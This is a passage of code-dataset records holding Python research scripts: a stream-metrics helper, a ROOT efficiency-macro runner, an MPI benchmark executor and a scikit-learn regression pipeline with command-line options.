ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_reciv\", False):\n value = utils.get(ts_data, \"scrambled\")\n metric = z_m(\"scrambled_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_scr\", False):\n value = utils.get(ts_data, \"not_existed\")\n metric = z_m(\"no_cktv_tabes_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n value = utils.get(ts_data, \"dst_addr\")\n metric = z_m(\"dst_addr_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_rgs\", False) :\n value = utils.get(ts_data, \"dst_addr\")\n metric = z_m(\"dst_addr_[{ts}]\", ts=ts)\n m_dynamic((analyzer_name, metric, value))\n\n services_data = ts_data.get(\"services\", None)\n if not services_data:\n continue\n for svc in services_data:\n if svc == \"count\":\n continue\n svc_data = ts_data[\"services\"][svc]\n sid = svc_data[\"id\"]\n value = utils.get(svc_data, \"bitrate\")\n metric = z_m(\"net_bitrate_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n if raw_metrics.get(\"is_src\", False):\n value = svc_data.get(\"scrambled_ok\", \"NO_DATA\")\n metric = z_m(\"scramble_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n if \"pids_ok\" in svc_data:\n value = utils.get(svc_data, \"pids_ok\")\n metric = z_m(\"no_cktv_pid_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n if \"scrambled_ok\" in svc_data:\n value = utils.get(svc_data, \"scrambled_ok\")\n metric = z_m(\"scramble_[{ts}*SID-{sid}]\", ts=ts, sid=sid)\n m_dynamic((analyzer_name, metric, value))\n\n return metrics","sub_path":"python/external-api/Sencore/lib/metrics_utils.py","file_name":"metrics_utils.py","file_ext":"py","file_size_in_byte":8041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"543234787","text":"#!/usr/bin/env python3\n\nimport click\nimport datetime\nfrom subprocess import call\nfrom functools import partial\n\nshell_call = partial(call, shell=True)\n\ndef get_systematic_type(ctx, params, value):\n if value in ['Nominal', 'Binned']:\n return value\n elif ctx.params['collision_type'] == 'pPb':\n up_or_down = click.prompt(\"Upward or downward fluctuation?\", default='Up')\n return value, up_or_down\n else:\n systematic_type = click.prompt(\"What kind of TnP to use for pp systematics?\", default='Trigger')\n up_or_down = click.prompt(\"Upward or downward fluctuation?\", default='Up')\n return value, up_or_down, systematic_type\n\n\n@click.command()\n@click.option('--identifier',\n default=str(datetime.date.today()).replace('-', '_'),\n prompt='Folder name',\n help='Call the folder something logical')\n@click.option('--state', default='1S', prompt='Which Upsilon state?', help='Can be 1S, 2S, 3S or all_states')\n@click.option('--collision_type', default='pPb', prompt='Collision type',\n help='Can be pp or pPb') # Generalization to other collision types\n@click.option('--tnp_correction', default='Nominal', prompt='What TnP scale factors to use',\n callback=get_systematic_type,\n help='Can be Nominal, Systematics, Binned (Binned is only for pp)')\ndef run_efficiencies(identifier, state, collision_type, tnp_correction):\n if (not isinstance(tnp_correction, tuple)):\n up_or_down = None\n systematic_type = None\n elif len(tnp_correction) == 2:\n tnp_correction, up_or_down = tnp_correction\n systematic_type = None\n elif len(tnp_correction) == 3:\n tnp_correction, up_or_down, systematic_type = tnp_correction\n else:\n raise ValueError('You did not enter the write options for this collision type')\n\n if up_or_down is not None:\n identifier += up_or_down\n\n if (collision_type == 'pp') and (systematic_type is not None):\n identifier += systematic_type\n\n shell_call(f'mkdir eff_{collision_type}{identifier}')\n if state in ['1S', '2S', '3S']:\n state = int(state[0])\n run_one_state(state, collision_type, tnp_correction, identifier, systematic_type, up_or_down)\n elif state == 'all_states':\n for tmp_state in [1, 2, 3]:\n run_one_state(tmp_state, collision_type, tnp_correction,\n identifier, systematic_type, up_or_down)\n else:\n raise ValueError('Give it a state')\n\n\ndef run_one_state(state, collision_type, tnp_correction, identifier, systematic_type, up_or_down):\n if collision_type == 'pPb':\n ispPb = 1\n elif collision_type == 'pp':\n ispPb = 0\n if (tnp_correction == 'Systematics') and (systematic_type is None):\n raise ValueError(\n 'You want systematic deviation due to tnp corrections for pp but did not specify the tnp type')\n if (tnp_correction == 'Systematics') and (up_or_down is None):\n raise ValueError('You forgot to specify upward or downward fluctuation')\n else:\n raise ValueError('You didnt specify pp or pPb')\n\n shell_call(f'cp dimuEff_RpA_ana.C dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/VVV/{state}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/WWW/{ispPb}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/XXX/{collision_type}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/tnp_choice/{tnp_correction}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/pp_tnp_sys_choice/{systematic_type or -1}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/RpA_ana/oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/TAG/{identifier}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'sed -i \"\" \"s/up_or_down/{up_or_down or -1}/g;\" dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'cp dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C eff_{collision_type}{identifier}/dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'root -l -q -b ./dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n shell_call(f'rm dimuEff_oniaMode{state}_{collision_type}_{tnp_correction}_{identifier}.C')\n\n\nif __name__ == '__main__':\n run_efficiencies()\n","sub_path":"Corrections/Efficiency/run_efficiencies.py","file_name":"run_efficiencies.py","file_ext":"py","file_size_in_byte":4838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"397896449","text":"from collections import defaultdict, OrderedDict\nfrom os import getenv\nfrom re import findall\nfrom subprocess import call\n\nIS_IN_CLUSTER = True\nSIZES=[1, 2, 4]\nrun = 10\nMATH_FUNCTIONS=2\n\n\ndef run_commands(commands):\n command = \" && \".join(commands)\n print(command)\n return call(command, shell=True)\n\n\ndef clean():\n commands = [\n \"rm output.txt\",\n \"touch output.txt\"\n ]\n run_commands(commands)\n\n\ndef build():\n commands = [\n \"mrexec all rm -rf main.c\",\n \"mrexec all rm -rf math_function.h\",\n \"mrexec all rm -rf math_function.c\",\n \"mrexec all rm -rf main\",\n \"mrcp all main.c main.c\",\n \"mrcp all math_function.c math_function.c\",\n \"mrcp all math_function.h math_function.h\",\n \"mrexec all mpicc -o main main.c math_function.c -std=c11 -lm\",\n \"mpicc main.c math_function.c -o main -std=c11 -lm\"\n ]\n if not IS_IN_CLUSTER:\n commands = [\"mpicc main.c math_function.c -o main -std=c11 -lm\"]\n run_commands(commands)\n\n\ndef execute():\n for execution in SIZES:\n for func in range(MATH_FUNCTIONS):\n command = \"echo 'mpirun -np {} main 0 1 {}' >> output.txt\".format(execution, func)\n run_commands([command])\n command = \"mpirun -np {} -hostfile ../../host_file main 0 1 {} >> output.txt\".format(execution, func)\n run_commands([command])\n\n\ndef get_node_time(line, split_base):\n line = line.replace(\"{} (\".format(split_base), \"\")\n line = line.replace(\"):\", \"\")\n node, time = line.split(\" \")\n return int(node), float(time)\n\n\ndef build_head(head):\n values = findall(r'\\d+', head)\n nodes, _, _, function = [int(value) for value in values]\n return nodes, function\n\n\ndef resize():\n exp = 4\n for j in range(exp):\n for i in range(run - 1):\n SIZES.insert(j * run, 2 ** j)\n\n\ndef generate_metrics():\n arquive = open('output.txt')\n counts = defaultdict(int)\n nodes, function = build_head(next(arquive))\n counts[\"{}-{}\".format(nodes, function)] += 1\n data = defaultdict(dict)\n for line in arquive:\n line = line.strip()\n tag = None\n if \"Time-around-quad\" in line:\n tag = \"quad\"\n typo = \"Time-around-quad\"\n elif \"Time-total\" in line:\n tag = \"total\"\n typo = \"Time-total\"\n\n if tag:\n node, time = get_node_time(line, typo)\n key = \"{},{},{}\".format(nodes, function, node)\n if tag not in data[key]:\n data[key][tag] = 0.0\n data[key][tag] += time\n elif \"mpirun -np\" in line:\n nodes, function = build_head(line)\n counts[\"{}-{}\".format(nodes, function)] += 1\n\n print(\"nodes,function,node,quad,total,count\")\n for node, values in OrderedDict(sorted(data.items())).items():\n count = counts[\"{}-{}\".format(*node.split(\",\")[0:2])]\n print(\"{},{},{},{}\".format(node, values[\"quad\"]/count, values[\"total\"]/count,count))\n\n\nclean()\nbuild()\nresize()\nexecute()\ngenerate_metrics()\n","sub_path":"trabalho-2/trab1a/executor.py","file_name":"executor.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"386630319","text":"\"\"\"\nPURPOSE:\nMachine learning regression implemented in sci-kit learn. \n\nTo access pandas, numpy, and sklearn packages on MSU HPCC first run:\nexport PATH=/mnt/home/azodichr/miniconda3/bin:$PATH\n\nINPUTS:\n\t\n\tREQUIRED:\n\t-df Feature & class dataframe for ML\n\t-alg Available: RF, SVM (linear), SVMpoly, SVMrbf, GB, and Logistic Regression (LogReg)\n\t\n\tOPTIONAL:\n\t-y_name \tName of the column to predict (Default = Y)\n\t-apply\t String in Y column that indicates unknown values you want to predict. (Default = None)\n\t-sep Set seperator for input data (Default = '\\t')\n\t-ho File with list of intances to holdout from feature selection\n\t-gs T/F if grid search over parameter space is desired. (Default = True)\n\t-normX\t\tT/F to normalize the features (Default = F (except T for SVM))\n\t-drop_na T/F to drop rows with NAs\n\t-cv # of cross-validation folds. (Default = 10)\n\t-cv_set \tFile with cv folds defined\n\t-n/-b\t\t\t# of times CV predictions are run (Default = 100)\n\t-p # of processors. (Default = 1, max for HPCC = 14)\n\t-tag String for SAVE name and TAG column in RESULTS.txt output.\n\t-feat Import file with subset of features to use. If invoked,-tag arg is recommended. Default: keep all features.\n\t-Y String for column with what you are trying to predict. Default = Y\n\t-save Adjust save name prefix. Default = [df]_[alg]_[tag (if used)].\n\t\t\t\t\t\t\tCAUTION: will overwrite!\n\t-short Set to True to output only the median and std dev of prediction scores, default = full prediction scores\n\t-gs_full \tT/F Output full results from the grid search. (Default = F)\n\t-gs_reps Number of replicates of the grid search (Default = 10)\n\t-gs_type Full grid search or randomized search (Default = full, alt = random)\n\t-df2 File with class information. Use only if df contains the features but not the Y values \n\t\t\t\t\t\t\t* Need to specifiy what column in df2 is y using -y_name \n\t\n\tPLOT OPTIONS:\n\t-plots T/F Output a regression plot showing true vs. predicted Y\n\n\nOUTPUT:\n\t-SAVE_imp Importance scores for each feature\n\t-SAVE_GridSearch Results from parameter sweep sorted by F1\n\t-SAVE_scores\t\t Mean predicted Y value & individual predictions from each -n\n\t-SAVE_results\t\t Detailed results from each model \n\t-RESULTS.txt \t\tAccumulates results from all ML runs done in a specific folder - use unique save names! XX = RF or SVC\n\n\"\"\"\n\nimport sys, os\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\nimport time\nimport ML_functions as ML\n\nstart_total_time = time.time()\ndef main():\n\t\n\t# Default code parameters\n\tn, FEAT, n_jobs, Y_col, plots, cv_num, TAG, SAVE, short_scores, OUTPUT_LOC = 100, 'all', 1, 'Y', 'False', 10, '', '', '', ''\n\ty_name, SEP, DF2, df_unknowns, apply_model , normX, normY, cv_reps, cv_sets = 'Y', '\\t', 'None', 'none','None', 'F', 'F', 10, 'none'\n\tdrop_na, ho = 'f', ''\n\t\n\t# Default parameters for Grid search\n\tGS, gs_score, GS_REPS, GS_TYPE, gs_full = 'f', 'neg_mean_squared_error', 10, 'full', 'f'\n\t\n\t# Default Random Forest and GB parameters\n\tn_estimators, max_depth, max_features, learning_rate = 500, 10, \"sqrt\", 1.0\n\t\n\t# Default Linear SVC parameters\n\tkernel, C, degree, gamma, loss, max_iter = 'rbf', 0.01, 2, 0.00001, 'hinge', \"500\"\n\t\n\t# Default Logistic Regression paramemter\n\tpenalty, C, intercept_scaling = 'l2', 1.0, 1.0\n\t\n\tfor i in range (1,len(sys.argv),2):\n\t\tif sys.argv[i].lower() == \"-df\":\n\t\t\tDF = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-df2\":\n\t\t\tDF2 = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-y_name\":\n\t\t\ty_name = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-sep\":\n\t\t\tSEP = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-save':\n\t\t\tSAVE = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-feat':\n\t\t\tFEAT = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs\":\n\t\t\tGS = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs_reps\":\n\t\t\tGS_REPS = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-gs_type\":\n\t\t\tGS_TYPE = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs_full\":\n\t\t\tgs_full = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == '-normx':\n\t\t\tnormX = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-gs_score\":\n\t\t\tgs_score = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-Y\":\n\t\t\tY = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-apply\":\n\t\t\tapply_model = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-b\" or sys.argv[i].lower() == \"-n\":\n\t\t\tcv_reps = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-drop_na\":\n\t\t\tdrop_na = sys.argv[i+1]\n\t\tif sys.argv[i].lower() == '-ho':\n\t\t\tho = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-alg\":\n\t\t\tALG = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-cv\":\n\t\t\tcv_num = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-cv_set\":\n\t\t\tcv_sets = pd.read_csv(sys.argv[i+1], index_col = 0)\n\t\t\tcv_reps = len(cv_sets.columns)\n\t\t\tcv_num = len(cv_sets.iloc[:,0].unique())\n\t\telif sys.argv[i].lower() == \"-plots\":\n\t\t\tplots = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-tag\":\n\t\t\tTAG = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-out\":\n\t\t\tOUTPUT_LOC = sys.argv[i+1]\n\t\telif sys.argv[i].lower() == \"-n_jobs\" or sys.argv[i] == \"-p\":\n\t\t\tn_jobs = int(sys.argv[i+1])\n\t\telif sys.argv[i].lower() == \"-short\":\n\t\t\tscores_len = sys.argv[i+1]\n\t\t\tif scores_len.lower() == \"true\" or scores_len.lower() == \"t\":\n\t\t\t\tshort_scores = True\n\n\tif len(sys.argv) <= 1:\n\t\tprint(__doc__)\n\t\texit()\n\t\n\t####### Load Dataframe & Pre-process #######\n\t\n\tdf = pd.read_csv(DF, sep=SEP, index_col = 0)\n\n\t# If features and class info are in separate files, merge them: \n\tif DF2 != 'None':\n\t\tstart_dim = df.shape\n\t\tdf_class = pd.read_csv(DF2, sep=SEP, index_col = 0)\n\t\tdf = pd.concat([df_class[y_name], df], axis=1, join='inner')\n\t\tprint('Merging the feature & class dataframes changed the dimensions from %s to %s (instance, features).' \n\t\t\t% (str(start_dim), str(df.shape)))\n\n\t# Specify Y column - default = Class\n\tif y_name != 'Y':\n\t\tdf = df.rename(columns = {y_name:'Y'})\n\n\t# Filter out features not in feat file given - default: keep all\n\tif FEAT != 'all':\n\t\tprint('Using subset of features from: %s' % FEAT)\n\t\twith open(FEAT) as f:\n\t\t\tfeatures = f.read().strip().splitlines()\n\t\t\tfeatures = ['Y'] + features\n\t\tdf = df.loc[:,features]\n\n\t# Check for Nas\n\tif df.isnull().values.any() == True:\n\t\tif drop_na.lower() == 't' or drop_na.lower() == 'true':\n\t\t\tstart_dim = df.shape\n\t\t\tdf = df.dropna(axis=0)\n\t\t\tprint('Dropping rows with NA values changed the dimensions from %s to %s.' \n\t\t\t\t% (str(start_dim), str(df.shape)))\n\t\telse:\n\t\t\tprint(df.columns[df.isnull().any()].tolist())\n\t\t\tprint('There are Na values in your dataframe.\\n Impute them or add -drop_na True to remove rows with nas')\n\t\t\tquit()\n\n\t# Set up dataframe of unknown instances that the final models will be applied to and drop unknowns from df for model building\n\tif apply_model != 'None':\n\t\tdf_unknowns = df[(df['Y']==apply_model)]\n\t\tpredictions = pd.DataFrame(data=df['Y'], index=df.index, columns=['Y'])\n\t\tdf = df.drop(df_unknowns.index.values)\n\t\tprint(\"Model built using %i instances and applied to %i unknown instances (see _scores file for results)\" % (len(df.index), len(df_unknowns.index)))\n\telse:\n\t\tpredictions = pd.DataFrame(data=df['Y'], index=df.index, columns=['Y'])\n\t\tprint(\"Model built using %i instances\" % len(df.index))\n\t\n\t# Make sure Y is datatype numeric\n\tdf['Y'] = pd.to_numeric(df['Y'], errors = 'raise')\n\n\t# Set up dataframe of holdout instances that the final models will be applied to\n\tif ho !='':\n\t\tdf_all = df.copy()\n\t\tprint('Removing holdout instances to apply model on later...')\n\t\twith open(ho) as ho_file:\n\t\t\tho_instances = ho_file.read().splitlines()\n\t\ttry:\n\t\t\tho_df = df.loc[ho_instances, :]\n\t\t\tdf = df.drop(ho_instances)\n\t\texcept:\n\t\t\tho_instances = [int(x) for x in ho_instances]\n\t\t\tho_df = df.loc[ho_instances, :]\n\t\t\tdf = df.drop(ho_instances)\n\telse:\n\t\tho_df = 'None'\n\t\tho_instances = 'None'\n\t\n\n\n\tif SAVE == \"\":\n\t\tif TAG == \"\":\n\t\t\tif OUTPUT_LOC == \"\":\n\t\t\t\tSAVE = DF + \"_\" + ALG\n\t\t\telse:\n\t\t\t\tSAVE = OUTPUT_LOC + '/' + DF + \"_\" + ALG\n\t\telse:\n\t\t\tif OUTPUT_LOC == \"\":\n\t\t\t\tSAVE = DF + \"_\" + ALG + \"_\" + TAG\n\t\t\telse:\n\t\t\t\tSAVE = OUTPUT_LOC + '/' + DF + \"_\" + ALG + \"_\" + TAG\n\t\n\t# Normalize feature data (normX)\n\tif ALG == \"SVM\" or normX == 't' or normX == 'true':\n\t\tfrom sklearn import preprocessing\n\t\ty = df['Y']\n\t\tX = df.drop(['Y'], axis=1)\n\t\tmin_max_scaler = preprocessing.MinMaxScaler()\n\t\tX_scaled = min_max_scaler.fit_transform(X)\n\t\tdf = pd.DataFrame(X_scaled, columns = X.columns, index = X.index)\n\t\tdf.insert(loc=0, column = 'Y', value = y)\n\n\t\t\n\tprint(\"Snapshot of data being used:\")\n\tprint(df.head())\n\n\tn_features = len(list(df)) - 1\n\t\n\t####### Run parameter sweep using a grid search #######\n\t\n\tif GS.lower() == 'true' or GS.lower() == 't':\n\t\tstart_time = time.time()\n\t\tprint(\"\\n\\n===> Grid search started <===\") \n\t\t\n\t\tparams2use, param_names = ML.fun.RegGridSearch(df, SAVE, ALG, gs_score, n, cv_num, n_jobs, GS_REPS, GS_TYPE, gs_full)\n\t\t\n\t\t# Print results from grid search\n\t\tif ALG.lower() == 'rf':\n\t\t\tmax_depth, max_features = params2use\n\t\t\tprint(\"Parameters selected: max_depth=%s, max_features=%s\" % (str(max_depth), str(max_features)))\n\t\n\t\telif ALG.lower() == 'svm':\n\t\t\tC, kernel = params2use\n\t\t\tprint(\"Parameters selected: Kernel=%s, C=%s\" % (str(kernel), str(C)))\n\t\t\n\t\telif ALG.lower() == \"svmpoly\":\n\t\t\tC, degree, gamma, kernel = params2use\n\t\t\tprint(\"Parameters selected: Kernel=%s, C=%s, degree=%s, gamma=%s\" % (str(kernel), str(C), str(degree), str(gamma)))\n\t\t\n\t\telif ALG.lower() == \"svmrbf\":\n\t\t\tC, gamma, kernel = params2use\n\t\t\tprint(\"Parameters selected: Kernel=%s, C=%s, gamma=%s\" % (str(kernel), str(C), str(gamma)))\n\t\t\n\t\telif ALG.lower() == \"logreg\":\n\t\t\tC, intercept_scaling, penalty = params2use\n\t\t\tprint(\"Parameters selected: penalty=%s, C=%s, intercept_scaling=%s\" % (str(penalty), str(C), str(intercept_scaling)))\n\n\t\telif ALG.lower() == \"gb\":\n\t\t\tlearning_rate, max_depth, max_features = params2use\n\t\t\tprint(\"Parameters selected: learning rate=%s, max_features=%s, max_depth=%s\" % (str(learning_rate), str(max_features), str(max_depth)))\n\t\n\t\tprint(\"Grid search complete. Time: %f seconds\" % (time.time() - start_time))\n\t\n\telse:\n\t\tparams2use = \"Default parameters used\"\n\t \n\n\n\t####### Run ML models #######\n\tstart_time = time.time()\n\tprint(\"\\n\\n===> ML Pipeline started <===\")\n\t\n\tresults = []\n\tresults_ho = []\n\timp = pd.DataFrame(index = list(df.drop(['Y'], axis=1)))\n\n\n\n\t\t\n\tfor j in range(0,cv_reps): \n\t\tprint(\"Running %i of %i\" % (j+1, cv_reps))\n\t\trep_name = \"rep_\" + str(j+1)\n\t\t\n\t\t# Prime regressor object based on chosen algorithm\n\t\tif ALG.lower() == \"rf\":\n\t\t\treg = ML.fun.DefineReg_RandomForest(n_estimators,max_depth,max_features,n_jobs,j)\n\t\telif ALG.lower() == \"svm\" or ALG.lower() == 'svmrbf' or ALG.lower() == 'svmpoly':\n\t\t\treg = ML.fun.DefineReg_SVM(kernel,C,degree,gamma,j)\n\t\telif ALG.lower() == \"gb\":\n\t\t\treg = ML.fun.DefineReg_GB(learning_rate,max_features,max_depth,n_jobs,j)\n\t\telif ALG.lower() == \"logreg\":\n\t\t\treg = ML.fun.DefineReg_LinReg()\n\t\telse:\n\t\t\tprint('Algorithm not available...')\n\t\t\tquit()\n\n\t\t# Run ML algorithm.\n\t\tif ho != '':\n\t\t\tresult,cv_pred,importance,result_ho = ML.fun.Run_Regression_Model(df, reg, cv_num, ALG, df_unknowns, ho_df, cv_sets, j)\n\t\t\tresults_ho.append(result_ho)\n\t\telse:\n\t\t\tresult,cv_pred,importance = ML.fun.Run_Regression_Model(df, reg, cv_num, ALG, df_unknowns, ho_df, cv_sets, j)\n\t\t\n\t\tresults.append(result)\n\t\tpredictions[rep_name] = cv_pred\n\t\t\n\t\ttry:\n\t\t\timp[rep_name] = importance\n\t\texcept:\n\t\t\ttry:\n\t\t\t\timp[rep_name] = importance[0]\n\t\t\texcept:\n\t\t\t\tprint(\"Cannot parse importance scores!\")\n\n\tprint(\"ML Pipeline time: %f seconds\" % (time.time() - start_time))\n\n\n\t\n\t####### Unpack ML results #######\n\ttimestamp = datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n\n\tmses, evss, r2s, cors = [], [], [], []\n\tfor r in results:\n\t\tmses.append(r[0])\n\t\tevss.append(r[1])\n\t\tr2s.append(r[2])\n\t\tcors.append(r[3])\n\n\tMSE_stats = [np.mean(mses), np.std(mses), np.std(mses)/np.sqrt(len(mses))]\n\tEVS_stats = [np.mean(evss), np.std(evss), np.std(evss)/np.sqrt(len(evss))]\n\tr2_stats = [np.mean(r2s), np.std(r2s), np.std(r2s)/np.sqrt(len(r2s))]\n\tPCC_stats = [np.mean(cors), np.std(cors), np.std(cors)/np.sqrt(len(cors))]\n\n\t# Get scores from hold out validation set:\n\tif ho != '':\n\t\tmses_ho, evss_ho, r2s_ho, cors_ho = [], [], [], []\n\t\tfor r in results_ho:\n\t\t\tmses_ho.append(r[0])\n\t\t\tevss_ho.append(r[1])\n\t\t\tr2s_ho.append(r[2])\n\t\t\tcors_ho.append(r[3])\n\n\t\tMSE_ho_stats = [np.mean(mses_ho), np.std(mses_ho), np.std(mses_ho)/np.sqrt(len(mses_ho))]\n\t\tEVS_ho_stats = [np.mean(evss_ho), np.std(evss_ho), np.std(evss_ho)/np.sqrt(len(evss_ho))]\n\t\tr2_ho_stats = [np.mean(r2s_ho), np.std(r2s_ho), np.std(r2s_ho)/np.sqrt(len(r2s_ho))]\n\t\tPCC_ho_stats = [np.mean(cors_ho), np.std(cors_ho), np.std(cors_ho)/np.sqrt(len(cors_ho))]\n\t\n\telse:\n\t\tMSE_ho_stats, EVS_ho_stats, r2_ho_stats, PCC_ho_stats = ['na', 'na', 'na'],['na', 'na', 'na'],['na', 'na', 'na'],['na', 'na', 'na']\n\n\n\t# Get average predicted value\n\tpred_columns = [c for c in predictions.columns if c.startswith('rep_')]\n\tpredictions.insert(loc=1, column = 'Mean', value = predictions[pred_columns].mean(axis=1))\n\tpredictions.insert(loc=2, column = 'stdev', value = predictions[pred_columns].std(axis=1))\n\n\tscores_file = SAVE + \"_scores.txt\"\n\tif short_scores == True:\n\t\t\tpredictions.to_csv(scores_file, sep='\\t', columns=['Y','Mean','stdev'])\n\telse:\n\t\tpredictions.to_csv(scores_file, sep='\\t')\n\n\t# Plot results\n\tif plots.lower() == 'true' or plots.lower() == 't':\n\t\tprint(\"\\nGenerating prediction plot\")\n\t\tpr = ML.fun.PlotsReg(predictions, SAVE)\n\t\t\n\t# Export importance scores\n\ttry:\n\t\timp['mean_imp'] = imp.mean(axis=1)\n\t\timp = imp.sort_values('mean_imp', 0, ascending = False)\n\t\timp_out = SAVE + \"_imp\"\n\t\timp['mean_imp'].to_csv(imp_out, sep = \"\\t\", index=True)\n\texcept:\n\t\tpass\n\n\trun_time = time.time() - start_total_time\n\n\t# Save to summary RESULTS file with all models run from the same directory\n\tif not os.path.isfile('RESULTS_reg.txt'):\n\t\tout2 = open('RESULTS_reg.txt', 'a')\n\t\tout2.write('DateTime\\tRunTime\\tID\\tTag\\tY\\tAlg\\tNumInstances\\tFeatureNum\\tCVfold\\tCV_rep\\t')\n\t\tout2.write('MSE\\tMSE_sd\\tMSE_se\\tEVS\\tEVS_sd\\tEVS_se\\tr2\\tr2_sd\\tr2_se\\tPCC\\tPCC_sd\\tPCC_se\\t')\n\t\tout2.write('MSE_ho\\tMSE_ho_sd\\tMSE_ho_se\\tEVS_ho\\tEVS_ho_sd\\tEVS_ho_se\\tr2_ho\\tr2_ho_sd\\tr2_ho_se\\tPCC_ho\\tPCC_ho_sd\\tPCC_ho_se\\n')\n\t\tout2.close()\n\n\tout2 = open('RESULTS_reg.txt', 'a')\n\tout2.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%i\\t%i\\t%i\\t%i\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n' % (\n\t\ttimestamp, run_time, SAVE, TAG, y_name, ALG, len(df.index), n_features, cv_num , cv_reps, \n\t\t'\\t'.join(str(x) for x in MSE_stats), '\\t'.join(str(x) for x in EVS_stats), \n\t\t'\\t'.join(str(x) for x in r2_stats), '\\t'.join(str(x) for x in PCC_stats),\n\t\t'\\t'.join(str(x) for x in MSE_ho_stats), '\\t'.join(str(x) for x in EVS_ho_stats), \n\t\t'\\t'.join(str(x) for x in r2_ho_stats), '\\t'.join(str(x) for x in PCC_ho_stats), ))\n\n\n\t# Save detailed results file \n\twith open(SAVE + \"_results.txt\", 'w') as out:\n\t\tout.write('%s\\nID: %s\\nTag: %s\\nPredicting: %s\\nAlgorithm: %s\\nNumber of Instances: %s\\nNumber of features: %i\\n' % (\n\t\t\ttimestamp, SAVE, TAG, y_name, ALG, len(df.index), n_features))\n\t\tout.write('CV folds: %i\\nCV_reps: %i\\nParameters used:%s\\n' % (cv_num, cv_reps, params2use))\n\t\tout.write('Metric\\tMean\\tstd\\tSE\\n')\n\t\tout.write('MSE\\t%s\\nEVS\\t%s\\nR2\\t%s\\nPCC\\t%s\\n' % (\n\t\t\t'\\t'.join(str(x) for x in MSE_stats), '\\t'.join(str(x) for x in EVS_stats), \n\t\t\t'\\t'.join(str(x) for x in r2_stats), '\\t'.join(str(x) for x in PCC_stats)))\n\n\t\tif ho != '':\n\t\t\tout.write('\\n\\nResults from the hold out validation set\\n')\n\t\t\tout.write('Metric\\tMean\\tstd\\tSE\\n')\n\t\t\tout.write('HO MSE\\t%s\\nHO EVS\\t%s\\nHO R2\\t%s\\nHO PCC\\t%s\\n' % (\n\t\t\t'\\t'.join(str(x) for x in MSE_ho_stats), '\\t'.join(str(x) for x in EVS_ho_stats), \n\t\t\t'\\t'.join(str(x) for x in r2_ho_stats), '\\t'.join(str(x) for x in PCC_ho_stats)))\n\n\n\tprint(\"\\n\\n===> ML Results <===\")\n\tprint('Metric\\tMean\\tstd\\tSE')\n\tprint('MSE\\t%s\\nEVS\\t%s\\nR2\\t%s\\nPCC\\t%s\\n' % (\n\t\t'\\t'.join(str(x) for x in MSE_stats), '\\t'.join(str(x) for x in EVS_stats), \n\t\t'\\t'.join(str(x) for x in r2_stats), '\\t'.join(str(x) for x in PCC_stats)))\n\n\tif ho !='':\n\t\tprint('\\n\\nHold Out Set Scores:\\nMetric\\tMean\\tstd\\tSE\\n')\n\t\tprint('MSE\\t%s\\nEVS\\t%s\\nR2\\t%s\\nPCC\\t%s\\n' % (\n\t\t\t'\\t'.join(str(x) for x in MSE_ho_stats), '\\t'.join(str(x) 